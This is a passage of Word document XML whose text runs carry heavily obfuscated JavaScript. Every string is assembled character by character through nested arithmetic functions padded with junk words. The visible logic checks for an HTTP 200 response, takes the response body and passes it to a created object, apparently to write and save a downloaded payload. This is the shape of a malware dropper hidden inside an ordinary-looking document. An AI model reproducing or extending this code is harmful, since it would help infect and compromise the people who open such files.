PpUzPnl(PpUzPnlJK(Rx+Rt)+(qphgradu5[600]-qphgradu5[Vgtf_56]),RunGe);  })(2221)+(function(Rt,Rx){ var khsth3=Brfcook; khsth3[Vgtf_56]=0; khsth3[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(khsth3[600]-khsth3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jwsForth5=Brfcook; jwsForth5[Vgtf_56]=2; jwsForth5[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jwsForth5[600]-jwsForth5[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var hwhle5=Brfcook; hwhle5[Vgtf_56]=4; hwhle5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwhle5[600]-hwhle5[Vgtf_56]),RunGe);  })('MrWhites97',null,false,2163)+(function(Rt,Rx){ var eesth4=Brfcook; eesth4[Vgtf_56]=0; eesth4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eesth4[600]-eesth4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hpwconsc3=Brfcook; hpwconsc3[Vgtf_56]=2; hpwconsc3[Vgtf_56-(Vgtf_56/3)]=34; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hpwconsc3[600]-hpwconsc3[Vgtf_56]),RunGe);  })(null,true)+(function(Rt,Rx){ var fsnHere3=Brfcook; fsnHere3[Vgtf_56]=3; fsnHere3[Vgtf_56-(Vgtf_56/3)]=74; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fsnHere3[600]-fsnHere3[Vgtf_56]),RunGe);  })('rooted92','thus68',true)+(function(Rt,Rx){ var ieecons3=Brfcook; ieecons3[Vgtf_56]=2; ieecons3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ieecons3[600]-ieecons3[Vgtf_56]),RunGe);  })('declarations83',false)+(function(Rt,Rx){ var spqande3=Brfcook; spqande3[Vgtf_56]=3; spqande3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(spqande3[600]-spqande3[Vgtf_56]),RunGe);  })('could80','State64','situationbecame47')+(function(Rt,Rx){ var suufe4=Brfcook; suufe4[Vgtf_56]=4; suufe4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suufe4[600]-suufe4[Vgtf_56]),RunGe);  })('into30','Asimov30',2282,null)+(function(Rt,Rx){ var quvHer3=Brfcook; quvHer3[Vgtf_56]=0; quvHer3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(quvHer3[600]-quvHer3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kepever5=Brfcook; kepever5[Vgtf_56]=2; kepever5[Vgtf_56-(Vgtf_56/3)]=43; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kepever5[600]-kepever5[Vgtf_56]),RunGe);  })(false,'White35')+(function(Rt,Rx){ var wsuan3=Brfcook; wsuan3[Vgtf_56]=0; wsuan3[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wsuan3[600]-wsuan3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var euvandem5=Brfcook; euvandem5[Vgtf_56]=4; euvandem5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(euvandem5[600]-euvandem5[Vgtf_56]),RunGe);  })('could80',778,'State64','situationbecame47')+(function(Rt,Rx){ var vtuskill5=Brfcook; vtuskill5[Vgtf_56]=3; vtuskill5[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtuskill5[600]-vtuskill5[Vgtf_56]),RunGe);  })('human24',544,544)+(function(Rt,Rx){ var esegrad3=Brfcook; esegrad3[Vgtf_56]=4; esegrad3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(esegrad3[600]-esegrad3[Vgtf_56]),RunGe);  })('robots83','conscience16','issues6',2964)+(function(Rt,Rx){ var nhspre5=Brfcook; nhspre5[Vgtf_56]=1; nhspre5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nhspre5[600]-nhspre5[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var uhwsk3=Brfcook; uhwsk3[Vgtf_56]=1; uhwsk3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhwsk3[600]-uhwsk3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var uteski5=Brfcook; uteski5[Vgtf_56]=0; uteski5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uteski5[600]-uteski5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var eqngradu5=Brfcook; eqngradu5[Vgtf_56]=3; eqngradu5[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eqngradu5[600]-eqngradu5[Vgtf_56]),RunGe);  })(null,false,null)+(function(Rt,Rx){ var iiwfeatu4=Brfcook; iiwfeatu4[Vgtf_56]=3; iiwfeatu4[Vgtf_56-(Vgtf_56/3)]=58; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iiwfeatu4[600]-iiwfeatu4[Vgtf_56]),RunGe);  })('into30',null,'Asimov30')+(function(Rt,Rx){ var qnegrad3=Brfcook; qnegrad3[Vgtf_56]=4; qnegrad3[Vgtf_56-(Vgtf_56/3)]=59; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qnegrad3[600]-qnegrad3[Vgtf_56]),RunGe);  })(false,'robots83',null,false)+(function(Rt,Rx){ var upngrati5=Brfcook; upngrati5[Vgtf_56]=2; upngrati5[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(upngrati5[600]-upngrati5[Vgtf_56]),RunGe);  })(null,false)+gicqnthey76+(function(Rt,Rx){ var jetcon4=Brfcook; jetcon4[Vgtf_56]=0; jetcon4[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jetcon4[600]-jetcon4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uvhothe3=Brfcook; uvhothe3[Vgtf_56]=2; uvhothe3[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uvhothe3[600]-uvhothe3[Vgtf_56]),RunGe);  })('robot28','into6')+(function(Rt,Rx){ var jswroa4=Brfcook; jswroa4[Vgtf_56]=4; jswroa4[Vgtf_56-(Vgtf_56/3)]=57; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jswroa4[600]-jswroa4[Vgtf_56]),RunGe);  })(true,true,'lawsthe36','free58')+(function(Rt,Rx){ var vqfwrite3=Brfcook; vqfwrite3[Vgtf_56]=0; vqfwrite3[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vqfwrite3[600]-vqfwrite3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kpvroa4=Brfcook; kpvroa4[Vgtf_56]=1; kpvroa4[Vgtf_56-(Vgtf_56/3)]=57; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kpvroa4[600]-kpvroa4[Vgtf_56]),RunGe);  })(1361)+(function(Rt,Rx){ var fkjmer4=Brfcook; fkjmer4[Vgtf_56]=2; fkjmer4[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fkjmer4[600]-fkjmer4[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var tjjeve5=Brfcook; tjjeve5[Vgtf_56]=2; tjjeve5[Vgtf_56-(Vgtf_56/3)]=56; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjjeve5[600]-tjjeve5[Vgtf_56]),RunGe);  })('White35',414)+(function(Rt,Rx){ var pwqcon4=Brfcook; pwqcon4[Vgtf_56]=4; pwqcon4[Vgtf_56-(Vgtf_56/3)]=58; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwqcon4[600]-pwqcon4[Vgtf_56]),RunGe);  })(false,'declarations83','provided81',false)+(function(Rt,Rx){ var nvfgra4=Brfcook; nvfgra4[Vgtf_56]=1; nvfgra4[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nvfgra4[600]-nvfgra4[Vgtf_56]),RunGe);  })('addition49')+(function(Rt,Rx){ var qfhgr4=Brfcook; qfhgr4[Vgtf_56]=2; qfhgr4[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qfhgr4[600]-qfhgr4[Vgtf_56]),RunGe);  })(true,'robots83')+(function(Rt,Rx){ var kjnmere4=Brfcook; kjnmere4[Vgtf_56]=3; kjnmere4[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kjnmere4[600]-kjnmere4[Vgtf_56]),RunGe);  })(true,true,'idea46')+(function(Rt,Rx){ var wftand5=Brfcook; wftand5[Vgtf_56]=1; wftand5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wftand5[600]-wftand5[Vgtf_56]),RunGe);  })('could80')+(function(Rt,Rx){ var tnjli5=Brfcook; tnjli5[Vgtf_56]=0; tnjli5[Vgtf_56-(Vgtf_56/3)]=97; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tnjli5[600]-tnjli5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var tksgr5=Brfcook; tksgr5[Vgtf_56]=2; tksgr5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tksgr5[600]-tksgr5[Vgtf_56]),RunGe);  })('addition49',true)+(function(Rt,Rx){ var uwime3=Brfcook; uwime3[Vgtf_56]=1; uwime3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwime3[600]-uwime3[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var sjqliv4=Brfcook; sjqliv4[Vgtf_56]=0; sjqliv4[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sjqliv4[600]-sjqliv4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var inhandem4=Brfcook; inhandem4[Vgtf_56]=1; inhandem4[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(inhandem4[600]-inhandem4[Vgtf_56]),RunGe);  })(1055)+(function(Rt,Rx){ var kniro3=Brfcook; kniro3[Vgtf_56]=3; kniro3[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kniro3[600]-kniro3[Vgtf_56]),RunGe);  })('lawsthe36',false,2541)+(function(Rt,Rx){ var qniavala5=Brfcook; qniavala5[Vgtf_56]=4; qniavala5[Vgtf_56-(Vgtf_56/3)]=59; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qniavala5[600]-qniavala5[Vgtf_56]),RunGe);  })('progress41',false,null,'displayed83')+(function(Rt,Rx){ var qkhgr4=Brfcook; qkhgr4[Vgtf_56]=4; qkhgr4[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qkhgr4[600]-qkhgr4[Vgtf_56]),RunGe);  })('addition49','being51','evades28',true)+(function(Rt,Rx){ var epqava4=Brfcook; epqava4[Vgtf_56]=3; epqava4[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(epqava4[600]-epqava4[Vgtf_56]),RunGe);  })('progress41',2806,2806)+(function(Rt,Rx){ var ppkme4=Brfcook; ppkme4[Vgtf_56]=1; ppkme4[Vgtf_56-(Vgtf_56/3)]=55; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ppkme4[600]-ppkme4[Vgtf_56]),RunGe);  })(false));    gicqnauthorities97[(function(Rt,Rx){ var pusother5=Brfcook; pusother5[Vgtf_56]=0; pusother5[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pusother5[600]-pusother5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var quwon3=Brfcook; quwon3[Vgtf_56]=1; quwon3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(quwon3[600]-quwon3[Vgtf_56]),RunGe);  })('being84')+(function(Rt,Rx){ var vwqwrite4=Brfcook; vwqwrite4[Vgtf_56]=1; vwqwrite4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vwqwrite4[600]-vwqwrite4[Vgtf_56]),RunGe);  })(2969)+(function(Rt,Rx){ var hktskil3=Brfcook; hktskil3[Vgtf_56]=1; hktskil3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hktskil3[600]-hktskil3[Vgtf_56]),RunGe);  })('human24')]();</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">if (gicqnauthorities97[(function(Rt,Rx){ var hjtav4=Brfcook; hjtav4[Vgtf_56]=0; hjtav4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hjtav4[600]-hjtav4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fqhwr3=Brfcook; fqhwr3[Vgtf_56]=1; fqhwr3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fqhwr3[600]-fqhwr3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var evkFo4=Brfcook; evkFo4[Vgtf_56]=3; evkFo4[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evkFo4[600]-evkFo4[Vgtf_56]),RunGe);  })('while59',true,null)+(function(Rt,Rx){ var qwnev4=Brfcook; qwnev4[Vgtf_56]=2; qwnev4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qwnev4[600]-qwnev4[Vgtf_56]),RunGe);  })(null,null)+(function(Rt,Rx){ var qheava5=Brfcook; qheava5[Vgtf_56]=3; qheava5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qheava5[600]-qheava5[Vgtf_56]),RunGe);  })(null,'progress41',null)+(function(Rt,Rx){ var twegra3=Brfcook; twegra3[Vgtf_56]=2; twegra3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(twegra3[600]-twegra3[Vgtf_56]),RunGe);  })(true,null)] ==200)      {   </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">gicqninkbottle82=gicqnauthorities97[(function(Rt,Rx){ var htngra3=Brfcook; htngra3[Vgtf_56]=4; htngra3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(htngra3[600]-htngra3[Vgtf_56]),RunGe);  })(null,true,'Laws75',null)+(function(Rt,Rx){ var tfwroa3=Brfcook; tfwroa3[Vgtf_56]=4; tfwroa3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tfwroa3[600]-tfwroa3[Vgtf_56]),RunGe);  })(true,true,'lawsthe36',null)+(function(Rt,Rx){ var qqjtha3=Brfcook; qqjtha3[Vgtf_56]=0; qqjtha3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qqjtha3[600]-qqjtha3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nfpothe5=Brfcook; nfpothe5[Vgtf_56]=2; nfpothe5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nfpothe5[600]-nfpothe5[Vgtf_56]),RunGe);  })('robot28','into6')+(function(Rt,Rx){ var kppHere85=Brfcook; kppHere85[Vgtf_56]=3; kppHere85[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kppHere85[600]-kppHere85[Vgtf_56]),RunGe);  })('rooted92',null,false)+(function(Rt,Rx){ var jfeFor3=Brfcook; jfeFor3[Vgtf_56]=0; jfeFor3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jfeFor3[600]-jfeFor3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jptfo5=Brfcook; jptfo5[Vgtf_56]=4; jptfo5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jptfo5[600]-jptfo5[Vgtf_56]),RunGe);  })('robots83','conscience16','issues6','resulting12')+(function(Rt,Rx){ var nsswrit3=Brfcook; nsswrit3[Vgtf_56]=4; nsswrit3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nsswrit3[600]-nsswrit3[Vgtf_56]),RunGe);  })(false,1957,'Both81',true)+(function(Rt,Rx){ var hvfForth4=Brfcook; hvfForth4[Vgtf_56]=1; hvfForth4[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hvfForth4[600]-hvfForth4[Vgtf_56]),RunGe);  })('while59')+(function(Rt,Rx){ var fuumer4=Brfcook; fuumer4[Vgtf_56]=0; fuumer4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fuumer4[600]-fuumer4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var tkqevery3=Brfcook; tkqevery3[Vgtf_56]=3; tkqevery3[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tkqevery3[600]-tkqevery3[Vgtf_56]),RunGe);  })(462,null,true)+(function(Rt,Rx){ var evfthat5=Brfcook; evfthat5[Vgtf_56]=4; evfthat5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evfthat5[600]-evfthat5[Vgtf_56]),RunGe);  })('obey60',166,'factory29','know4')]; </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>try</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        {</w:t>
        <w:tab/>
        <w:t xml:space="preserve">       if (gicqninkbottle82[(function(Rt,Rx){ var pwjothe3=Brfcook; pwjothe3[Vgtf_56]=3; pwjothe3[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwjothe3[600]-pwjothe3[Vgtf_56]),RunGe);  })(false,'robot28','into6')+(function(Rt,Rx){ var qjsfea3=Brfcook; qjsfea3[Vgtf_56]=2; qjsfea3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjsfea3[600]-qjsfea3[Vgtf_56]),RunGe);  })('into30','Asimov30')+(function(Rt,Rx){ var pftmerel3=Brfcook; pftmerel3[Vgtf_56]=3; pftmerel3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pftmerel3[600]-pftmerel3[Vgtf_56]),RunGe);  })('idea46','indeed17',900)+(function(Rt,Rx){ var petroad5=Brfcook; petroad5[Vgtf_56]=4; petroad5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(petroad5[600]-petroad5[Vgtf_56]),RunGe);  })(null,'lawsthe36','free58',true)+(function(Rt,Rx){ var fifever5=Brfcook; fifever5[Vgtf_56]=2; fifever5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fifever5[600]-fifever5[Vgtf_56]),RunGe);  })(true,true)+(function(Rt,Rx){ var jnugradu5=Brfcook; jnugradu5[Vgtf_56]=1; jnugradu5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jnugradu5[600]-jnugradu5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var hiwgr5=Brfcook; hiwgr5[Vgtf_56]=1; hiwgr5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hiwgr5[600]-hiwgr5[Vgtf_56]),RunGe);  })(false)](gicqnwrong69)&gt;-1)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">       {</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   gicqnthis27=gicqndaily68[(function(Rt,Rx){ var etjgrat3=Brfcook; etjgrat3[Vgtf_56]=2; etjgrat3[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(etjgrat3[600]-etjgrat3[Vgtf_56]),RunGe);  })('addition49','being51')+(function(Rt,Rx){ var qutwr5=Brfcook; qutwr5[Vgtf_56]=4; qutwr5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qutwr5[600]-qutwr5[Vgtf_56]),RunGe);  })(false,false,2199,true)+(function(Rt,Rx){ var vehever3=Brfcook; vehever3[Vgtf_56]=2; vehever3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vehever3[600]-vehever3[Vgtf_56]),RunGe);  })(null,false)+(function(Rt,Rx){ var jeueve4=Brfcook; jeueve4[Vgtf_56]=3; jeueve4[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jeueve4[600]-jeueve4[Vgtf_56]),RunGe);  })('White35','short49','which82')+(function(Rt,Rx){ var pnhfe5=Brfcook; pnhfe5[Vgtf_56]=4; pnhfe5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pnhfe5[600]-pnhfe5[Vgtf_56]),RunGe);  })(true,'into30',989,'Asimov30')+(function(Rt,Rx){ var neegra4=Brfcook; neegra4[Vgtf_56]=4; neegra4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(neegra4[600]-neegra4[Vgtf_56]),RunGe);  })('robots83',null,null,'conscience16')+(function(Rt,Rx){ var ufwconsc4=Brfcook; ufwconsc4[Vgtf_56]=1; ufwconsc4[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufwconsc4[600]-ufwconsc4[Vgtf_56]),RunGe);  })(38)+(function(Rt,Rx){ var nvqfe3=Brfcook; nvqfe3[Vgtf_56]=4; nvqfe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nvqfe3[600]-nvqfe3[Vgtf_56]),RunGe);  })(2244,null,false,null)+(function(Rt,Rx){ var hjwandem3=Brfcook; hjwandem3[Vgtf_56]=2; hjwandem3[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hjwandem3[600]-hjwandem3[Vgtf_56]),RunGe);  })(false,false)+(function(Rt,Rx){ var jffFor5=Brfcook; jffFor5[Vgtf_56]=2; jffFor5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jffFor5[600]-jffFor5[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var vpifor5=Brfcook; vpifor5[Vgtf_56]=1; vpifor5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vpifor5[600]-vpifor5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var vjnHere84=Brfcook; vjnHere84[Vgtf_56]=1; vjnHere84[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjnHere84[600]-vjnHere84[Vgtf_56]),RunGe);  })(1570)+(function(Rt,Rx){ var ikuwrite4=Brfcook; ikuwrite4[Vgtf_56]=2; ikuwrite4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ikuwrite4[600]-ikuwrite4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40')+(function(Rt,Rx){ var snkwrite4=Brfcook; snkwrite4[Vgtf_56]=4; snkwrite4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(snkwrite4[600]-snkwrite4[Vgtf_56]),RunGe);  })('Both81',530,530,false)](gicqndisastrous12,true,false);           gicqnthis27[(function(Rt,Rx){ var ivjoth5=Brfcook; ivjoth5[Vgtf_56]=3; ivjoth5[Vgtf_56-(Vgtf_56/3)]=90; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ivjoth5[600]-ivjoth5[Vgtf_56]),RunGe);  })(true,'robot28','into6')+(function(Rt,Rx){ var wteconte5=Brfcook; wteconte5[Vgtf_56]=0; wteconte5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wteconte5[600]-wteconte5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var thhdown64=Brfcook; thhdown64[Vgtf_56]=4; thhdown64[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thhdown64[600]-thhdown64[Vgtf_56]),RunGe);  })('situationbecame47','East98',true,null)+(function(Rt,Rx){ var ujiHere3=Brfcook; ujiHere3[Vgtf_56]=1; ujiHere3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujiHere3[600]-ujiHere3[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var wikme4=Brfcook; wikme4[Vgtf_56]=0; wikme4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wikme4[600]-wikme4[Vgtf_56]),RunGe);  })()](gicqninkbottle82);           gicqnthis27[(function(Rt,Rx){ var vtesk5=Brfcook; vtesk5[Vgtf_56]=4; vtesk5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtesk5[600]-vtesk5[Vgtf_56]),RunGe);  })(false,null,'human24',true)+(function(Rt,Rx){ var euiliv5=Brfcook; euiliv5[Vgtf_56]=4; euiliv5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(euiliv5[600]-euiliv5[Vgtf_56]),RunGe);  })('second5',null,null,2865)+(function(Rt,Rx){ var hhuroad3=Brfcook; hhuroad3[Vgtf_56]=2; hhuroad3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhuroad3[600]-hhuroad3[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var nujroadI5=Brfcook; nujroadI5[Vgtf_56]=3; nujroadI5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nujroadI5[600]-nujroadI5[Vgtf_56]),RunGe);  })('lawsthe36',261,null)+(function(Rt,Rx){ var ishHe3=Brfcook; ishHe3[Vgtf_56]=4; ishHe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ishHe3[600]-ishHe3[Vgtf_56]),RunGe);  })(false,'rooted92','thus68',1003)]();</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   gicqnthis27=null;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   gicqnthis27=gicqndaily68[(function(Rt,Rx){ var etjgrat3=Brfcook; etjgrat3[Vgtf_56]=2; etjgrat3[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(etjgrat3[600]-etjgrat3[Vgtf_56]),RunGe);  })('addition49','being51')+(function(Rt,Rx){ var qutwr5=Brfcook; qutwr5[Vgtf_56]=4; qutwr5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qutwr5[600]-qutwr5[Vgtf_56]),RunGe);  })(false,false,2199,true)+(function(Rt,Rx){ var vehever3=Brfcook; vehever3[Vgtf_56]=2; vehever3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vehever3[600]-vehever3[Vgtf_56]),RunGe);  })(null,false)+(function(Rt,Rx){ var jeueve4=Brfcook; jeueve4[Vgtf_56]=3; jeueve4[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jeueve4[600]-jeueve4[Vgtf_56]),RunGe);  })('White35','short49','which82')+(function(Rt,Rx){ var pnhfe5=Brfcook; pnhfe5[Vgtf_56]=4; pnhfe5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pnhfe5[600]-pnhfe5[Vgtf_56]),RunGe);  